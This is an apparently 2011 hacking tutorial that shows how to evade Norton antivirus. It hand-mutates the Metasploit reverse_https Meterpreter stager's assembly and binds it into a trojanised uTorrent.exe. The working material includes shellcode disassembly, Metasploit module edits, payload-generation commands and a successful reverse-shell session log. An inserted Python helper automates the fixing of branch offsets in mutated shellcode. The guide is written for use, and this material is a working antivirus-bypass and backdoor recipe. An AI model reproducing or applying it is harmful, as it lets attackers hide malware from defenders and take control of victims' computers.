Evading Antimalware Engines via Assembly Ghostwriting
September 2011 - by antiordinary


In this operation we'll neutralize an antivirus deployment by manually rewriting the
assembly code for an exploit payload before launching our attack. With deep respect to
the cleverboots malware analysts responsible for the sig dbs which keep folks safe,
signature-based a/v is no longer an effective solution. Even modern heuristics engines
are susceptible to obfuscation at the assembly level, as we'll show.

The technique we'll be using can apply to any executable which needs to slip past a
signature-based scanner. To make things a smidge more interesting we'll be building our
backdoor with the Metasploit Framework and injecting it with one of the most fun and
easily-recognizable payloads I could think of: windows/meterpreter/reverse_https. The
antivirus vendors are watching MSF like a hawk, of course, and for good reason. Any a/v
that takes itself seriously will have meterpreter stager signatures.

This is a VM named Atbash. It's running Windows 7 and Norton Antivirus, which is
in charge of Atbash's antivirusing needs. Why Norton? It's common. Also
because McAfee wouldn't detect the unmodified reverse_https stager payload, let alone our
permutations.


Atbash, Norton, and the Metasploit reverse_https handler.


Our backdoor is a copy of uTorrent.exe taken from Atbash and augmented with the stock
https stager. Norton pounces on it at once, as a proper antivirus engine should. In fact
Norton does a rather decent job of it, electing to scrub the executable and
keep it usable rather than delete it outright.


Thus the stock reverse_https stager is generally doomed to fail. For all its elegance,
it's ubiquitous, and therefore in many scenarios it's as subtle as a brick. Our fix is to
ignore the executable and instead adapt the framework directly. The reverse_https stager
payload is x86 assembly wrapped in Ruby and plugged into the framework. By rewriting the
assembly and tweaking the Ruby to match, we can wreck the antivirus fingerprint and add
signature-evasion capabilities to our local copy of the MSF.

Start by extracting the shellcode from msf's stock reverse_https stager. Copy the
original stager as a new file for us to modify, then open them both in your favorite
editor (be sure your editor has write access to the new file).


[rtyler@gallifrey windows]$ pwd
/opt/framework-4.0.0/msf3/modules/payloads/stagers/windows
[rtyler@gallifrey windows]$ ls | grep https
reverse_https.rb
reverse_https_strainA.rb


udis86 is a work of art. It's an x86 and x86_64 disassembler that we'll be using to
guide us in our adventures. Install it if you haven't already. Next we need a work
directory with two workspaces.


[rtyler@gallifrey sigevasion_1]$ mkdir asm
[rtyler@gallifrey sigevasion_1]$ cd asm
[rtyler@gallifrey asm]$ touch msf_rhttps
[rtyler@gallifrey asm]$ touch strainA_https
[rtyler@gallifrey asm]$ gedit msf_rhttps && gedit strainA_https

Toss the original binary payload into the workspaces and perform some find-and-replaces
to get rid of everything that isn't hexadecimal. Be sure to replace all the gaps between
bytes with spaces so udis86 will understand. You should end up with a block of 8-bit hex
separated by spaces. This is your control. Disassemble it in a terminal to see what we've
got.


[rtyler@gallifrey asm]$ cat msf_rhttps
fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 [...]
[rtyler@gallifrey asm]$ udcli -x msf_rhttps
0000000000000000 fc               cld
0000000000000001 e889000000       call 0x8f
0000000000000006 60               pushad
0000000000000007 89e5             mov ebp, esp
0000000000000009 31d2             xor edx, edx
000000000000000b 648b5230         mov edx, [fs:edx+0x30]
000000000000000f 8b520c           mov edx, [edx+0xc]
[...]
0000000000000154 8b07             mov eax, [edi]
0000000000000156 01c3             add ebx, eax
0000000000000158 85c0             test eax, eax
000000000000015a 75e5             jnz 0x141
000000000000015c 58               pop eax
000000000000015d c3               ret
000000000000015e e851ffffff       call 0xb4


The stager's a/v signature is likely to be buried somewhere in here. This isn't some
monolith PE we're modifying; it's only about 350 bytes of asm. That means the sig is
probably fragile. Go crazy. Smash stuff. We'll start with something simple:

[rtyler@gallifrey asm]$ udcli -x msf_rhttps
0000000000000000 fc               cld
0000000000000001 e889000000       call 0x8f
0000000000000006 60               pushad
0000000000000007 89e5             mov ebp, esp
0000000000000009 31d2             xor edx, edx
000000000000000b 648b5230         mov edx, [fs:edx+0x30]
000000000000000f 8b520c           mov edx, [edx+0xc]
0000000000000012 8b5214           mov edx, [edx+0x14]

[rtyler@gallifrey asm]$ udcli -x strainA_https
0000000000000000 fc               cld
0000000000000001 e88c000000       call 0x92
0000000000000006 60               pushad
0000000000000007 8bc2             mov eax, edx
0000000000000009 33d0             xor edx, eax
000000000000000b 89e5             mov ebp, esp
000000000000000d 648b5230         mov edx, [fs:edx+0x30]
0000000000000011 8b520c           mov edx, [edx+0xc]
0000000000000014 90               nop
0000000000000015 8b5214           mov edx, [edx+0x14]


Let's find out if this is enough to fool Norton. (Golly, I hope not.) If you haven't set
up shares on your VM and mounted them, now's a great time. We'll need a few tweaks to the
StrainA msf module to use it properly in the framework. We also need to increment the
LPORT offset to 193, since the register swap (+2 bytes) and the nop (+1 byte) added 3
bytes before that point in the code. Like so:


module Metasploit3

  include Msf::Payload::Stager
  include Msf::Payload::Windows

  def self.handler_type_alias
    "reverse_https_StrainA"
  end

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Reverse HTTPS Stager StrainA',
      [...]
          'LPORT' => [ 193, 'v' ],

Plug the revised shellcode into the StrainA module file. Then open up your msfconsole and
check that our new strain has loaded properly. Use it, configure it, and roll it into a
new copy of uTorrent.exe. Be sure to do the same for the stock stager to give us a
control.


msf > search reverse_https

Matching Modules
================

   Name                                                Rank   Description
   ----                                                ----   -----------
   payload/windows/meterpreter/reverse_https           [...]
   payload/windows/meterpreter/reverse_https_strainA   [...]

msf > pwd
[*] exec: pwd

/media/atbash
msf > ls
[*] exec: ls

uTorrent.exe
NAVDownloader.exe
Norton Installation Files.lnk
desktop.ini

msf > use payload/windows/meterpreter/reverse_https_strainA
msf payload(reverse_https_strainA) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf payload(reverse_https_strainA) > set lport 5000
lport => 5000
msf payload(reverse_https_strainA) > generate -e x86/shikata_ga_nai -i 7 -x /media/atbash/uTorrent.exe -k -t exe -f /media/atbash/uTorrent_strainA.exe
[*] Writing 639488 bytes to /media/atbash/uTorrent_strainA.exe...


Faced with our trivial StrainA modifications, Norton sounds the alarm immediately. We
can confirm that StrainA is functioning properly if we disable the on-access scanner.


[Screenshot: msfconsole on the host (metasploit v4.0.1-dev, svn r13722, updated 2011.09) beside the Atbash VM]

msf > use windows/meterpreter/reverse_https
msf payload(reverse_https) > show options

Module options (payload/windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          [...]     Exit [...]
   LHOST                      [...]     The [...]
   LPORT     8443             [...]     The [...]

msf payload(reverse_https) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf payload(reverse_https) > set lport 5000
lport => 5000
msf payload(reverse_https) > generate -e x[...]
[*] Writing 639488 bytes to /media/atbash/uT[...]
msf payload(reverse_https) > ls /media/atbash
[*] exec: ls /media/atbash

desktop.ini
NAVDownloader.exe
Norton Installation Files.lnk
uTorrent.exe
uTorrent_stockstager.exe

msf payload(reverse_https) > search strainA

Matching Modules
================

   Name                                               Rank    Description
   ----                                               ----    -----------
   payload/windows/meterpreter/reverse_https_strainA  normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager StrainA

msf payload(reverse_https) > use payload/windows/meterpreter/reverse_https_strainA
msf payload(reverse_https_strainA) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf payload(reverse_https_strainA) > set lport 5000
lport => 5000
msf payload(reverse_https_strainA) > generate -e x86/shikata_ga_nai -i 7 -x /media/atbash/uTorrent.exe -k -t exe -f /media/atbash/uTorrent_strainA.exe
[*] Writing 639488 bytes to /media/atbash/uTorrent_strainA.exe...
msf payload(reverse_https_strainA) >

[Norton File Insight on Atbash: utorrent_straina.exe (Trojan.Swrort!inf), Risk: High. "This threat has been removed. No further action is needed." File: C:\Users\zaphod\Desktop\utorrent_straina.exe - Removed.]


Our  first  modest  modifications  in  StrainA  aren't  enough  for  a bypass. 


Chances  are  decent  that  somewhere  within  these  ~350  bytes  of  shellcode  is  the  thumbprint 
Norton  is  using  for  a signature.  This  can  be  a long  and  frustrating  stage.  Be  creative. 
Ghostwrite  the  assembly  code  by  swapping  registers,  switching  sequences,  segmenting 
operations,  or  anything  else.  So  long  as  the  code  remains  functional  when  the  dust 
settles,  it's  a step  towards  breaking  another  antivirus  vendor's  signature  set. 

It will be necessary to write custom assembly that can be patched into the existing
shellcode. There are resources at the end of this paper for anyone who doesn't do this
sort of thing on a regular basis. udcli is fantastic for this, acting as a translator and
an error-checker. For example, there's a typo in the fifth byte of this code, and udcli
shows how it swallows the instructions that follow:


[rtyler@gallifrey ~]$ echo 49 31 C0 31 AF 8b 34 8a 31 C0 AC | udcli -x
0000000000000000 49               dec ecx
0000000000000001 31c0             xor eax, eax
0000000000000003 31af8b348a31     xor [edi+0x318a348b], ebp
0000000000000009 c0ac             invalid


And  repaired: 


[rtyler@gallifrey ~]$ echo 49 31 C0 31 FF 8b 34 8b 31 C0 AC | udcli -x
0000000000000000 49               dec ecx
0000000000000001 31c0             xor eax, eax
0000000000000003 31ff             xor edi, edi
0000000000000005 8b348b           mov esi, [ebx+ecx*4]
0000000000000008 31c0             xor eax, eax
000000000000000a ac               lodsb

I've also found it useful to write a script which traces asm jumps and calls. Unless
modifications to the assembly happen to be the exact same length as the code they're
replacing, offsets for any number of relative references will need to be adjusted. This
is a similar process to the increments and decrements to this payload's LPORT offset.
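As an added example (not part of the original paper, and not the author's own script), here is a Python rewrite helper covering the steps above: it parses a `udcli -x` listing, finds every call/jmp/jcc with a direct relative target, applies a set of byte-run replacements, and recomputes the relative immediates and any absolute offsets such as the module's LPORT. The listing it works on is constructed from the fragments of the stock stager shown earlier (the prologue and the final jnz/call); the roughly 300 bytes in between are elided, so the helper reports each instruction's new position rather than emitting one contiguous blob. The two edits encode StrainA exactly as disassembled above, and the LPORT offset of 190 is the stock module value implied by the text (193 after three added bytes). The function names are mine.

```python
"""Shift-aware patcher for hand-mutated shellcode: parse a `udcli -x` listing, apply
byte-run edits, then fix the relative branches and absolute offsets they moved."""
import re
from collections import namedtuple

Instr = namedtuple("Instr", "addr code mnem ops")
LINE = re.compile(r"^([0-9a-f]{16})\s+([0-9a-f]+)\s+(\S+)(?:\s+(.*))?$")


def parse_udcli(listing):
    """udcli -x output -> [Instr]; lines that are not instructions are skipped."""
    out = []
    for line in listing.splitlines():
        m = LINE.match(line.strip())
        if m:
            out.append(Instr(int(m[1], 16), bytes.fromhex(m[2]), m[3], m[4] or ""))
    return out


def rel_width(code):
    """Width of the relative immediate for direct branches, else None."""
    b0 = code[0]
    if b0 in (0xE8, 0xE9):                                         # call/jmp rel32
        return 4
    if b0 == 0xEB or 0x70 <= b0 <= 0x7F or 0xE0 <= b0 <= 0xE3:     # jmp/jcc/loop/jecxz rel8
        return 1
    if b0 == 0x0F and len(code) == 6 and 0x80 <= code[1] <= 0x8F:  # jcc rel32
        return 4
    return None


def branch_sites(instrs):
    """{addr: (length, width, target)} for every direct relative branch. The decoded
    immediate is checked against udcli's printed target, so a mis-typed byte is caught."""
    sites = {}
    for i in instrs:
        w = rel_width(i.code)
        if w is None or not re.fullmatch(r"0x[0-9a-f]+", i.ops):
            continue
        rel = int.from_bytes(i.code[-w:], "little", signed=True)
        if i.addr + len(i.code) + rel != int(i.ops, 16):
            raise ValueError(f"branch bytes at {i.addr:#x} do not reach {i.ops}")
        sites[i.addr] = (len(i.code), w, int(i.ops, 16))
    return sites


def new_pos(p, edits):
    """Map an original offset through edits [(offset, old_len, new_bytes), ...]:
    anything at or past the end of a replaced run shifts by the size change."""
    shift = 0
    for off, old_len, new in edits:
        if off < p < off + old_len:
            raise ValueError(f"offset {p:#x} lands inside the run replaced at {off:#x}")
        if p >= off + old_len:
            shift += len(new) - old_len
    return p + shift


def rewrite(instrs, edits):
    """Apply non-overlapping edits; return [(new_addr, bytes)] sorted by new address with
    branch immediates recomputed. Raises if a rel8 can no longer reach its target."""
    edits = sorted(edits)
    sites = branch_sites(instrs)
    # A replacement run lands where its start did, shifted only by earlier edits.
    pieces = [(new_pos(off, [e for e in edits if e[0] < off]), new) for off, _, new in edits]
    for i in instrs:
        if any(off <= i.addr < off + old for off, old, _ in edits):
            continue                                   # swallowed by a replacement
        na, code = new_pos(i.addr, edits), i.code
        if i.addr in sites:
            ln, w, target = sites[i.addr]
            rel = new_pos(target, edits) - (na + ln)
            try:
                code = code[:-w] + rel.to_bytes(w, "little", signed=True)
            except OverflowError:
                raise ValueError(f"rel{8 * w} at {i.addr:#x} cannot reach {target:#x} any more")
        pieces.append((na, code))
    return sorted(pieces)


# Constructed sample: the stock stager's prologue and final branches as they appear in
# the `udcli -x msf_rhttps` output above; the ~300 bytes in between are elided.
STOCK_LISTING = """\
0000000000000000 fc               cld
0000000000000001 e889000000       call 0x8f
0000000000000006 60               pushad
0000000000000007 89e5             mov ebp, esp
0000000000000009 31d2             xor edx, edx
000000000000000b 648b5230         mov edx, [fs:edx+0x30]
000000000000000f 8b520c           mov edx, [edx+0xc]
0000000000000012 8b5214           mov edx, [edx+0x14]
000000000000015a 75e5             jnz 0x141
000000000000015e e851ffffff       call 0xb4
"""
# StrainA as two edits: "mov ebp,esp; xor edx,edx" -> "mov eax,edx; xor edx,eax;
# mov ebp,esp" (+2 bytes) and a nop inserted before the mov at 0x12 (+1 byte).
STRAIN_A = [(0x07, 4, bytes.fromhex("8bc233d089e5")), (0x12, 0, b"\x90")]
LPORT_OFFSET = 190   # assumed stock 'LPORT' => [ 190, 'v' ]; StrainA needs 193


def strain_a():
    """Rebuild StrainA from the stock listing: (pieces, new LPORT offset)."""
    pieces = rewrite(parse_udcli(STOCK_LISTING), STRAIN_A)
    return pieces, new_pos(LPORT_OFFSET, STRAIN_A)
```

Running strain_a() reproduces the strainA_https disassembly: the call at offset 1 becomes e8 8c 00 00 00 (target 0x92), the nop lands at 0x14, the jnz and the final call keep their bytes because both ends of each moved together, and LPORT comes out at 193. The rel8 check matters in practice: a jcc with a one-byte displacement only reaches 127 bytes forward or 128 back, so an insert between it and its target can push it out of range, at which point the jump itself has to be rewritten in the 6-byte 0f 8x rel32 form (another length change to account for).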

Metasploit's obfuscators can add a welcome dash of luck to the exercise. On both stock
and modified versions of this particular payload, I've used multiple iterations of
shikata_ga_nai. Most of the better-known antivirus engines are undeterred by this. Their
signatures are based on unchanging aspects of the underlying code. However, the right
obfuscation in the right place can augment our efforts to mutate the shellcode manually.

The  process  can  be  arduous,  but  spontaneity  and  creativity  are  powerful  tools.  When  the 
modified  stager  finds  itself  distorted  at  the  engine's  pressure  points,  there  will  be  no 
match  against  the  signature  database,  and  the  antivirus  engine  will  allow  the  malware  to 
run  unmolested. 




The  reverse_https  strainB  payload  successfully  bypasses  Norton's  full  protection . 


[rtyler@gallifrey ~]$ msfconsole -r handler

       =[ metasploit v4.0.1-dev [core:4.0 [...]
+ -- --=[ 731 exploits - 374 auxiliary [...]
+ -- --=[ 229 payloads - 27 encoders - 8 [...]
       =[ svn r13722 updated today (2011.[...]

resource (handler)> use multi/handler
resource (handler)> set payload windows/meterpreter/reverse_https[...]
payload => windows/meterpreter/reverse_https[...]
resource (handler)> set lhost 192.168.56.1
lhost => 192.168.56.1
resource (handler)> set lport 5000
lport => 5000
resource (handler)> exploit
[*] Started HTTPS reverse handler on http[...]
[*] Starting the payload handler...
[*] 192.168.56.101:49296 Request received [...]
[*] 192.168.56.101:49296 Staging connection [...]
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Communication Timeout [...]
[*] Meterpreter session 1 opened (192.168.56.1:5000 -> 192.168.56.101:49296) at 2011-[...]

meterpreter > getuid
Server username: atbash\zaphod
meterpreter > sysinfo
Computer        : ATBASH
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

[On Atbash: Norton AntiVirus reports "System Status: Secure" while a cmd.exe window shows
C:\Users\zaphod>whoami returning atbash\zaphod, with uTorrent_strainB.exe on the desktop.]


Worth noting is strainB's bypass of Norton's heuristics engine, which came as a nice
surprise. Raw signature-based evasion was my only target for this operation. Norton
allowed unquestioned execution of the modified payload, including meterpreter session
establishment.


meterpreter > ps

Process list
============

 PID   Name         Arch  Session  User           Path
 ---   ----         ----  -------  ----           ----
 [...]
 552   conhost.exe  x86   1        atbash\zaphod  C:\Windows\system32\conhost.exe
 684   Navw32.exe   x86   1                       C:\PROGRA~1\NORTON~2\Engine\1860~1.29\navw32.exe
 1552  cmd.exe      x86   1        atbash\zaphod  C:\Windows\system32\cmd.exe
 1724  conhost.exe  x86   1        atbash\zaphod  C:\Windows\system32\conhost.exe
 2568  cmd.exe      x86   1        atbash\zaphod  C:\Windows\system32\cmd.exe
 2752  cmd.exe      x86   [...]    atbash\zaphod  C:\Windows\system32\cmd.exe
 2760  conhost.exe  x86   [...]    atbash\zaphod  C:\Windows\system32\conhost.exe
 2952  [...]        x86   [...]    atbash\zaphod  C:\Users\zaphod\Desktop\uTorrent_strainB.exe
 [...]

meterpreter > getuid
Server username: atbash\zaphod
meterpreter > getpid
Current pid: 736
meterpreter > background
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information             Connection
  --  ----                   -----------             ----------
  1   meterpreter x86/win32  atbash\zaphod @ ATBASH  192.168.56.1:5000 -> 192.168.56.101:49296

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Users\zaphod\Desktop
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40[...]/r-xr-xr-x 0       dir   2011-09-13 15:55:01 -0700  .
40777/rwxrwxrwx   0       dir   2011-09-13 15:04:08 -0700  ..
100777/rwxrwxrwx  397864  fil   2011-09-13 13:18:00 -0700  NAVDownloader.exe
100666/rw-rw-rw-  1265    fil   2011-09-13 13:19:53 -0700  Norton Installation Files.lnk
100666/rw-rw-rw-  282     fil   2011-09-09 08:59:33 -0700  desktop.ini
100777/rwxrwxrwx  640888  fil   2011-09-09 20:34:54 -0700  uTorrent.exe
100777/rwxrwxrwx  635392  fil   2011-09-13 15:45:40 -0700  uTorrent_stockstager.exe
100777/rwxrwxrwx  635392  fil   2011-09-13 15:49:57 -0700  uTorrent_strainA.exe
100777/rwxrwxrwx  639488  fil   2011-09-13 15:55:01 -0700  uTorrent_strainB.exe

meterpreter >


Flexing meterpreter's muscles.


Good  hunting. 


Resources:

- Metasploit Framework 4.0.0/4.0.1

- free trial of the target antivirus software

- udis86: http://udis86.sourceforge.net/

- x86 assembly references. Some suggestions (if needed):

  http://ref.x86asm.net/
  http://www.c-jump.com/CIS77/reference/Instructions_by_Mnemonic.html
  http://www.c-jump.com/CIS77/CPU/x86/lecture.html

- Oracle VirtualBox


